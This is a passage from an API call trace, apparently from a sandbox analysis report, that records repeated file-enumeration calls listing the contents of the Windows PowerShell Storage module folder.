dwReserved1=0x0, cFileName="StorageSetting.cdxml", cAlternateFileName="")) returned 1 [0177.943] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb35b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageSubSystem.cdxml", cAlternateFileName="")) returned 1 [0177.943] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x223b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageTier.cdxml", cAlternateFileName="")) returned 1 [0177.943] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="TargetPort.cdxml", cAlternateFileName="")) returned 1 [0177.944] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc46, dwReserved0=0x0, dwReserved1=0x0, cFileName="TargetPortal.cdxml", cAlternateFileName="")) returned 1 [0177.944] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x870c, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualDisk.cdxml", cAlternateFileName="")) returned 1 [0177.944] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Volume.cdxml", cAlternateFileName="")) returned 1 [0177.945] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Volume.cdxml", cAlternateFileName="")) returned 0 [0177.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.946] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0177.946] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", lpFilePart=0x0) returned 0x3b [0177.946] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.947] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.947] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x63de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Disk.cdxml", cAlternateFileName="")) returned 1 [0177.948] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1672, dwReserved0=0x0, dwReserved1=0x0, cFileName="DiskImage.cdxml", cAlternateFileName="")) returned 1 [0177.948] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd78, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileIntegrity.cdxml", cAlternateFileName="")) returned 1 [0177.948] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21df, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileServer.cdxml", cAlternateFileName="")) returned 1 [0177.949] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileShare.cdxml", cAlternateFileName="")) returned 1 [0177.949] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed3, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileStorageTier.cdxml", cAlternateFileName="")) returned 1 [0177.949] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1988, dwReserved0=0x0, dwReserved1=0x0, cFileName="InitiatorId.cdxml", cAlternateFileName="")) returned 1 [0177.950] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d28, dwReserved0=0x0, dwReserved1=0x0, cFileName="InitiatorPort.cdxml", cAlternateFileName="")) returned 1 [0177.950] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5af4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MaskingSet.cdxml", cAlternateFileName="")) returned 1 [0177.994] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OffloadDataTransferSetting.cdxml", cAlternateFileName="")) returned 1 [0177.994] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Partition.cdxml", cAlternateFileName="")) returned 1 [0177.994] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x523b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhysicalDisk.cdxml", cAlternateFileName="")) returned 1 [0177.995] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="ResiliencySetting.cdxml", cAlternateFileName="")) returned 1 [0177.995] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfb55, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.format.ps1xml", cAlternateFileName="")) returned 1 [0177.995] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1937, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.psd1", cAlternateFileName="")) returned 1 [0177.996] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b0d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.types.ps1xml", cAlternateFileName="")) returned 1 [0177.996] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2591b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageCmdlets.cdxml", cAlternateFileName="")) returned 1 [0177.996] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageEnclosure.cdxml", cAlternateFileName="")) returned 1 [0177.997] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageHealth.cdxml", cAlternateFileName="")) returned 1 [0177.997] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x204c, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageJob.cdxml", cAlternateFileName="")) returned 1 [0177.997] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageNode.cdxml", cAlternateFileName="")) returned 1 [0177.998] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x800a, dwReserved0=0x0, dwReserved1=0x0, cFileName="StoragePool.cdxml", cAlternateFileName="")) returned 1 [0177.998] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageProvider.cdxml", cAlternateFileName="")) returned 1 [0177.998] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x331, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageReliabilityCounter.cdxml", cAlternateFileName="")) returned 1 [0177.998] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7853, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageScripts.psm1", cAlternateFileName="")) returned 1 [0177.999] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageSetting.cdxml", cAlternateFileName="")) returned 1 [0177.999] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb35b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageSubSystem.cdxml", cAlternateFileName="")) returned 1 [0177.999] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x223b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageTier.cdxml", cAlternateFileName="")) returned 1 [0178.000] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="TargetPort.cdxml", cAlternateFileName="")) returned 1 [0178.000] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc46, dwReserved0=0x0, dwReserved1=0x0, cFileName="TargetPortal.cdxml", cAlternateFileName="")) returned 1 [0178.000] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x870c, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualDisk.cdxml", cAlternateFileName="")) returned 1 [0178.001] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Volume.cdxml", cAlternateFileName="")) returned 1 [0178.001] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.002] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0178.002] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0178.003] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.004] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, 